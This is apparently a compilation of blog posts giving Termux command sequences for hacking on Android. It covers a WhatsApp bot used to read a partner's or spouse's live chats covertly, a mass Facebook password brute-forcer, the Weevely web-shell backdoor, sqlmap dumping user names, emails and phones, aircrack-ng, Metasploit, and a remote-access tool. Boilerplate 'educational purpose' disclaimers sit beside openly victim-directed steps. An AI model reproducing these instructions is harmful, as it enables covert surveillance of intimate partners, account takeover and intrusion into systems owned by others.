Hack Whatsapp Live Chat
* pkg update && pkg upgrade
* pkg install git wget ffmpeg nodejs npm
* git clone https://github.com/mrfzvx12/termux-whatsapp-bot or git clone https://github.com/mrfzvx12/lexav3
cd termux-whatsapp-bot
* chmod 777 install.sh
* bash install.sh or ./install.sh
node index.jss
You need to scan this QR Code using victim (friend, boyfriend, girlfriend, husband and wife) mobile. After that, you will be connected to victim Whatsapp. Now you can see live chat. You can also find out the number of the person who is chatting to the target WhatsApp
how to install Weevely Web shell backdoor in Android Using Termux without root permission. How to install Weevely Backdoor WebShell in Termux In this post i am gonna show You about Weevely Tool Installation. Weevely is a Stealth PHP web Shell. It Simulate Telnet like Connections. It is an Essential web Tool For Web Application's Post Exploitation, And It can be used as a Stealth backdoor OR as a web shell manage Legit Accounts even the Free hosted ones. How to Install Weevely in Termux :
John The Ripper Install In Android Via Termux App
JTR [john the ripper] is a free password cracking Software Or Tool .Its a Free password cracking Tool for Linux/Kali Linux/Ubuntu/Termux .It is mainly Design for UNIX Operating System .Now we can Use this tool on different platforms ,
John the Ripper tool is a most powerful Tool for pen-testing / password breaking program , it cracks the passwords which are encrypted format .
John The Ripper cracks passwords into one of packages, autodetects passwords hashes types & it can be run agenest the encrypted passwords,to get the real or decrypted password.
JTR in Termux
John The Ripper Installation In Termux [Android] :
Follow These Steps to install JTR in Termux
open Play Store and download the Termux App
After install termux app ,Now open termux and update your Terminal .use this command
apt update
install wget package :- pkg install wget
Install JTR Tool by this command
wget https://kuburan.github.io/JtR-jumbo_1.8.0_aarch64.deb
Now install these packages manually step by step
apt install./Jtr-jumbo_1.8.0_aarch64.deb
john --list=build-info
john -- test
After installation these packages go to JTR folder by this command
cd JtR
cd tools
ls
Now see here all the packages of John The Ripper are available Here.
Thank you friends if you like this article of my blog please follow me on This blog for more Articles about Ethical Hacking ,Termux Tutorials,Android penetration Testing,articles on my blog.
Thank You,
©CmTechZ
Hack Facebook with Termux
How To Hack Facebook With termux 2018 - Hello reader How to Hack Facebook With termux 2018, we have prepared this article well for you to read and take the information in it. hopefully the contents of the post, which we write you can understand. okay, happy reading.
Multi Bruteforce Facebook feature:
Auto grab ID facebook from group
Auto grab ID facebook from friendlist
Mass Bruteforce facebook account
Bruteforce with single password
Bruteforce with wordlist
Installation:
$ pkg install python2 git
$ pip2 install mechanize
Running tool:
$ git clone https://github.com/pirmansx/multi-bruteforce-facebook.git $ cd multi-bruteforce-facebook
$ python2 MBF.py
Option number:
1 for grab ID from group
2 for grab ID from your friendlist
3 for exit
If you chosse option 1. you must now ID target group
login facebook with your browser, and search target group ,, open the group and see the link
you can see the ID of the facebook group, and copy it.
That's an article from How To Hack Facebook with termux 2018 this time, hopefully can benefit for you all. okay, see you in other article post.
©CmTechz
What is Termux ?
Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically — additional packages are available using the APT package manager.
Apps like Termux also enable anyone to enumerate subdomains very easily using available tools like Knockpy.
We will be seeing some of the basic commands to use in termux app.
TO UPDATE
apt update
Check whether termux is properly installed
pkg install sl
sl
Now you will be seeing a moving train if all is well with the setup of Termux.
Know all running processes in Termux
top
Display text in a different style
apt install figlet
figlet anyword
You will get the text in a different style.
See Matrix background animation on Termux
apt install cmatrix
cmatrix + ENTER
Find factors of a number
pkg install coreutils
factor 1337
Go to the friendly interactive shell, fish
apt install fish
fish+ENTER
Fish command autocompletes the commands. Type exit to go out.
To see text in colorful style
apt install toilet
toilet -f mono12 -F green BugBounty
To open any site in termux
apt install w3m
w3m google.com
Installing Metasploit in Termux
First, install curl
pkg install curl
after that:
curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
Get access permission
chmod 777 metasploit.sh
./metasploit.sh
In the same manner, you can install packages according to the need easily through any smartphone.
There are a lot of Termux packages available on Github which can be easily installed and configured. Let me link you to the Official github repo of termux packages- Termux Packages
How to install SQLMAP in termux:
1. apt update && apt upgrade
2. apt install python
3. apt install python2
4. apt install git
5. git clone https://github.com/sqlmapproject/sqlmap
6. cd sqlmap
7. Python2 sqlmap.py
Exemple:
Python2 sqlmap.py -u website –dbs
-D acuart –tables
-D acuart -T users –columns
-D acuart -T users -C name,email,phone -dump
SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
*This is for Educational purpose only, I am not responsible for what you do.
Brought to you by:
CM_TECHZ
If you wish to install the metasploit-framework all by itself (damn you lazy people 😂) , You can use a shell script to install it.
cd $HOME pkg install wget wget https://Auxilus.github.io/metasploit.sh bash metasploit.sh
./msfconsole.Manual Installation
Prequisities
pkg install autoconf bison clang coreutils curl findutils git apr apr-util libffi-dev libgmp-dev libpcap-dev \
postgresql-dev readline-dev libsqlite-dev openssl-dev libtool libxml2-dev libxslt-dev ncurses-dev pkg-config \
wget make ruby-dev libgrpc-dev termux-tools ncurses ncurses-utils libsodium-dev termux-exec
git clone https://github.com/rapid7/metasploit-framework cd metasploit-framework
- NOTE
- Cloning repository is not recommended as it may have some bugs!
curl -L https://github.com/rapid7/metasploit-framework/archive/4.17.9.tar.gz | tar xz cd metasploit-framework-4.17.9 sed 's|git ls-files|find -type f|' -i metasploit-framework.gemspec
gem install bundler
Install gems
nokogiri
gem to use local librariesgem install nokogiri -- --use-system-libraries
bundle install -j5
Fix shebangs
$PREFIX/bin/find -type f -executable -exec termux-fix-shebang \{\} \;Now you can run
./msfconsoleConnect to Database
cd $HOME/metasploit-framework/config curl -LO https://Auxilus.github.io/database.yml mkdir -p $PREFIX/var/lib/postgresql initdb $PREFIX/var/lib/postgresql pg_ctl -D $PREFIX/var/lib/postgresql start createuser msf createdb msf_database
Today in this Tutorial i am gonna show you, How to install Kali Linux Tools on Android phone using Termux App and this script Lazymux.
What is Termux :
Termux is a Kali Linux terminal emulator with an extensive Linux packages collections,It is specially design for Android for penetration testing .
we can install Tools from Github and easily use.this is not a rott terminal of Kali Linux but ,if Your Device is Rooted Then we can make this Termux Terminal as a root terminal by installing Sudo on Termux.
So first we need to install Lazymux on Your Termux
How to install Lazymux in Termux :-
![]() |
| lazymux in termux no root |
step 2:- Open Termux application
step 3:- Update termux using this command
apt update
step 4:- now install some important packages
pkg install clang
pkg install git
step 5 :- install python2, you must be install python2
pkg install python2
step 6 :- install lazymux on Your Termux
step 7 :- make the python file executable
chmod +x lazymux.py
step 8 :- Now run Lazumux :- python2 lazymux.py
Now select the number ,which you want to install simply select number ,when select the tool number then that tool can start installing on your Termux.
All Termux commands :_
here Termux commands are divided into many categories as follows
1) cd [change directory commands]
cd = change directory
cd / = change to root directory
cd - = move one directory back from where you are now
cd ~ = move to users home directory from anywhere
cd .. = change current directory to parent directory
cd -- = show last working directory from where we moved.
pwd = it shows your current working directory
2) Basic Networking Commands
ifconfig = shows configuration a network interface.
ifconfig = for check your local ip,mac, or display the current network interface information
ifconfig -a = display the configuration of all interfaces,both active and inactive
ifconfig eth0 = used to view the network settings on the interface eth0
ifconfig wlan0 = used to view the network settings on wlan0
ifconfig eth1 up = used to active the network interface eth1
ifconfig eth1 down =used to Deactive the network interface eth1
ifconfig wlan0 down = Deactive the network interface wlan0
ifconfig wlan0 up = active the network interface wlan0
ifconfig wlan0 netmask 225.225.225.0 = to use the network mask 225.225.225.0 in wlan0 network interface
coming soon....tommarrow.
Assalamu-Alaikum friends :
****DECLAIMER*****
This article is only for educational purpose,Don't miss use these tutorials use these tricks on your own computer,network,android,devices,for check the vulnerabilities and fix it and always stay legal,if you are used these article in any illegal or malicious activity then i am not responsible so please friends always stay legal.
###########################
aircrack-ng using in Termux/GnuRoot Debian/Android/Linux :-
download aircrack-ng using, pdf FILE. simply click download pdf
Follow these Steps :-
First connect your wife-adapter to your device :
1) Friends first open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :
airmon-ng
airmon-ng start wlan0
2) Now start the network detecting by typing this command :
airodump-ng wlan0mon
metasploit installation in Termux nokogiri gems error Fixed .
****************************************
* *
* Credit: *
* The Owner, who's script used in This video is *
* https://github.com/Auxilus *
* *
****************************************
*******DECLAIMER********
This article and this video is only for Educational Purpose Dont miss use this tutorials ,Because Hacking is Crime. if you can use this trick or this video/article any illegal or malicious activities then You can Land in Jail and i am not responsible for this.so Friends always stay legal and try these tricks on Your Own devices and networks to find the vulnerabilities and fix it, and always stay legal..:)
Metasploit :
Metasploit Framework is a open source project. the metasploit framework project is created for computer security projects, metasploit provides information about security vulnerabilities and penetration testing,
metasploit framework is a tool and it develops the codes, payload, exploits aginest the target systems to access all information about target system.
Metasploit framework was created by H. D. Moore in year 2003 using perl. and the metasploit framework is completely rewrite Ruby language. the metasploit project announced On October 21, year 2009.
Friends we can install metasploit framework on windows,Android (using termux app) and it is default installed in Kali Linux penetration testing toolkit or OS (operating systems)
so in this article/practical video i am gonna show you how to install metasploit framework on termux and in this script the all errors are fixed by metasploit team and in this video i am using the script of Auxilus .
Follow These Steps :
1) download Termux from Play store and open and update using this command
apt update
2) Now install wget package by using this command :
pkg install wget
3) Now install Metasploit by Typing This command:
wget (metasploit link is in this video)
4) now run the script : bash (script name) which available after the clone metasploit package in Termux watch video care fully
5) watch video carefully to successfully install metasploit in Termux...:)
Remember:
This article and videos only for educational purpose only Dont miss use these Tutorials and please do not use this method for illegal or malicious activities because hacking is crime if you do this its can land you in jail so please friends stay always legal.
modules:
1) you can find website vulnerabilities and fix it
2) you can DDOs on site and fix it
3)you can brute force on mail account and fix it by creating strong password
practical video and article of Hunner Framework :
1) open termux and update by typing this command apt update
2) install git package pkg install git
3) Now install python pkg install python
4) now install hunner on Termux using this command:
git clone https://github.com/b3-v3r/Hunner.git
5) cd Hunner
6) chmod +x hunner.py
7) python hunner.py
Friends Welcome :
A-Rat tool is a free open source Remote Administration Tool
Friends we can install A-Rat tool on, Kali Linux,Ubuntu and Android also in This Article and practical videos i am gonna show you How to install A-Rat tool on Android using Termux App.
WARNING :
Friends my All articles and practical videos of penetration testing are only for Educational Purpose Only ,,Don't miss use these Tutorials. use these Tutorials on your own devices,network,computers etc..., for checking the vulnerabilities o f networks and your Devices and fix it.always stay legal.
2 Methods To Install A-Rat Tool On Termux :
1 Method :
You need to install Lazymux in Your Termux and install A-Rat Tool simply click on the Below video and watch the practical video of the Lazymux Installation
after installation of lazymux there are options in 22 number is avilable for A-RAt tool installation simply click the number 22 and install the A-Rat tool in termux.
2 Method:
Clone the A-RAt tool in Termux Using GitHub
Follow these Commands :
1) download termux from play store and update Termux Using this command:
apt update
2) now install python2 and git packages using these commands:
pkg install python2
pkg install git
3) After installation of these above packages now clone A-Rat tool using this command:
git clone https://github.com/Xi4u7/A-Rat.git
4) Now go into the A-Rat directory and Run Using these commands :
cd A-Rat
chmod +x A-Rat.py
python2 A-Rat.py
These above commands are installation process of A-Rat tool in Termux .
#############################
lazymux is a tool, which consists of some Kali Linux tools and it is
very easy to install and use on Android using Termux App.
Friends Lazymux tool is only for Termux Users.
simply clone this Tool on Your Termux and Run after the Run This Tool there is
some Kali Linux Tools are available ,as you can see on the Below image.lazymux
is the best tool for termux to install the kali linux tools on Android and use for
Penetration testing and cyber security,and remember friends these all Knowledge
and videos are only for Educational purpose only Don't miss use these Tutorials
use this tutorials for find the vulnerabilities and fix it.
| lazymux tool image |
if you Don't know about python language and pythons history then clcik on the below python history button to know the information about python:
python history
Installation :
Follow These Steps:
1) Download Termux from Play Store and open and update using this command:
apt update
2) Now install Python2 and Git packages By using These Commands :
pkg install Python2
pkg install git
3) After the installation of above packages Now install lazymux on Android (Termux)By using this command :
git clone https://github.com/Gameye98/Lazymux.git
4) Now follow these steps step By step:
cd Lazymux
chmod +x *
./meta-install.sh
5) Now Run the lazymux tool by typing this command :
python2 lazymux.py
6) Now select Any number which you want to install in Termux










